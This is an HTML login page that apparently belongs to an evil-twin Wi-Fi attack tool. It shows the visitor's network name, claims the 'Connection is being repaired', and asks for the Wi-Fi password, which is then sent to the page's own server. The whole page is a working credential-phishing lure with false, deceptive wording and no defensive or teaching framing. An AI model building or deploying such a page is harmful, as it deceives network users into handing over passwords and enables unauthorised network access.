<html>
<meta charset=utf-8 > 
<meta name=viewport content="width=device-width, initial-scale=0.8, minimal-ui"> 
<meta name=description content=244v234 > 
<meta name=theme-color content="#ffffff" /> 
<title>Login</title> 


 <link rel=stylesheet href=style.css>
 <style>@charset utf-8;body{background:#36393e;color:#bfbfbf;font-family:sans-serif;margin:0}h1{font-size:1.7rem;margin-top:1rem;background:#2f3136;color:#bfbfbb;padding:.2em 1em;border-radius:3px;border-left:solid #4974a9 5px;font-weight:100}h2{font-size:1.1rem;margin-top:1rem;background:#2f3136;color:#bfbfbb;padding:.4em 1.8em;border-radius:3px;border-left:solid #4974a9 5px;font-weight:100}.box{height:100%;width:100%;padding:5px 0}.lock{vertical-align:middle;margin:0 10px}.box input{display:block;width:300px;margin:20px auto;padding:10px;background:rgba(0,0,0,0.4);color:#fff;border:0}.box .button{background:#2f3136;border:0;color:#fff;font-size:20px;width:320px;color:#27ae60;margin:20px auto;display:block;cursor:pointer;border-radius:10px}.box .facebook{background-color:#4267b2;font-size:10px;width:320px;margin:20px auto;display:block;border-radius:10px}.box .zalo{background-color:#87c6ec;font-size:10px;width:320px;margin:20px auto;display:block;border-radius:10px}.box .phone{background:#2f3136;font-size:10px;width:320px;margin:20px auto;display:block;border-radius:10px}.box .twitter{background-color:#4ab3f4;font-size:10px;width:320px;margin:20px auto;display:block;border-radius:10px}.box p{font-size:14px;text-align:center;padding:4px}table{border-collapse:collapse}label{line-height:38px}p{margin:.5em 0}.left{float:left}.right{float:right}.bold{font-weight:bold}.red{color:#F04747}.green{color:#43B581}.clear{clear:both}.centered{text-align:center}.select{width:98px !important;padding:0 !important}.selected{background:#4974a9}.status{width:120px;padding-left:8px}.labelFix{line-height:44px}.clickable{cursor:pointer}.settingName{text-transform:uppercase;font-weight:bold;text-decoration:underline}#error{text-align:center;color:#fff;background:#af3535;border-radius:5px;padding:10px;margin-top:10px}#closeError{float:right;color:#fff;padding:0 10px;cursor:pointer}#copyright{font-size:.95em;text-align:center;margin-top:3em;margin-bottom:3em}.checkBoxContainer{display:block;position:relative;padding-left:35px;margin-bottom:12px;cursor:pointer;font-size:22px;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;height:32px}.checkBoxContainer input{position:absolute;opacity:0;cursor:pointer}.checkmark{position:absolute;top:8px;left:0;height:28px;width:28px;background-color:#2F3136;border-radius:4px}.checkmark:after{content:"";position:absolute;display:none}.checkBoxContainer input:checked~.checkmark:after{display:block}.checkBoxContainer .checkmark:after{left:10px;top:7px;width:4px;height:10px;border:solid white;border-width:0 3px 3px 0;-webkit-transform:rotate(45deg);-ms-transform:rotate(45deg);transform:rotate(45deg)}.hide{display:none}.show{display:block !important;animation-name:fadeIn;animation-duration:1s}@keyframes fadeIn{0%{opacity:0}100%{opacity:1}}hr{background:#3e4146}a{color:#5281bb;text-decoration:none}a:hover{color:#95b8e4}li{margin:4px 0}.meter_background{background:#42464D;width:100%;word-break:normal;min-width:100px}.meter_forground{color:#fff;padding:4px 0}.meter_green{background:#43B581}.meter_orange{background:#FAA61A}.meter_red{background:#F04747}.meter_value{padding-left:8px}table{width:100%;min-width:400px;margin-bottom:2em}td{word-break:break-all}th{word-break:break-word}th,td{padding:10px 6px;text-align:left;border-bottom:1px solid #5d5d5d}@media screen and (max-width:820px){#apTable .id,#apTable .enc,#apTable .mac,#apTable .vendor,#apTable .name,#stTable .id,#stTable .pkts,#stTable .lastseen,#stTable .mac,#nTable .id,#nTable .vendor,#nTable .ap,#nTable .mac,#ssidTable .id{display:none}.meter_background{min-width:45px}}nav{display:block;padding:8px 10px;background:#2f3136}nav a{color:#bfbfbf;padding:.5em;display:inline-block;text-decoration:none}nav a:hover{background:#36393f;color:#cecece;border-radius:4px}.upload-script,.button,button,input[type=submit],input[type=reset],input[type=button]{display:inline-block;height:38px;padding:0 20px;color:#fff;text-align:center;font-size:11px;font-weight:600;line-height:38px;letter-spacing:.1rem;text-transform:uppercase;text-decoration:none;white-space:nowrap;background:#2f3136;border-radius:4px;border:0;cursor:pointer;box-sizing:border-box}button:active,input[type=submit]:active,input[type=reset]:active,input[type=button]:active{transform:scale(.93)}input[type=text]{width:10em}.setting{width:100% !important;max-width:284px !important}.container{width:100%;margin-left:auto;margin-right:auto;max-width:1140px}.row{position:relative;width:100%}.row [class^="col"]{float:left;margin:.25rem 2%;min-height:.125rem}.col-1,.col-2,.col-3,.col-4,.col-5,.col-6,.col-7,.col-8,.col-9,.col-10,.col-11,.col-12{width:96%}.row::after{content:"";display:table;clear:both}.hidden-sm{display:none}@media only screen and (min-width:24em){.col-1{width:4.33%}.col-2{width:12.66%}.col-3{width:21%}.col-4{width:29.33%}.col-5{width:37.66%}.col-6{width:46%}.col-7{width:54.33%}.col-8{width:62.66%}.col-9{width:71%}.col-10{width:79.33%}.col-11{width:87.66%}.col-12{width:96%}.hidden-sm{display:block}}

</style>
  <body onload="load()"> 
  	<div class=container>
  	 <div class=row>
  	  <div class=col-12> 
  	  	<div id=error  class=hide ></div>
  	  	 <br> 
  	  	 <p class=centered data-translate=disclaimer> Submit Your Password
  	  	 	<br>
  	  	  <br> Connection is being repaired<br> There were several errors that cause this to happen.
  	  	  <br> Please Re-Enter your Wifi Password to continue.<br> </p>
  	  	   <div class=box > 
  	  	   	<h2  style="text-align: center;"><span id="ssid">ssid</span></h2>
            <form action='/' method='get'>
  	  	   	 <input type=password   name=password  required placeholder="password" />
  	  	   	  <input type=submit value="Confirm" class=button > 
  	  	   	</div>
           </form>
  	  	   	 </div>
  	  	   	</div>
  	  	   </div>
           <script src="index.js"></script>
        </body>
        </html>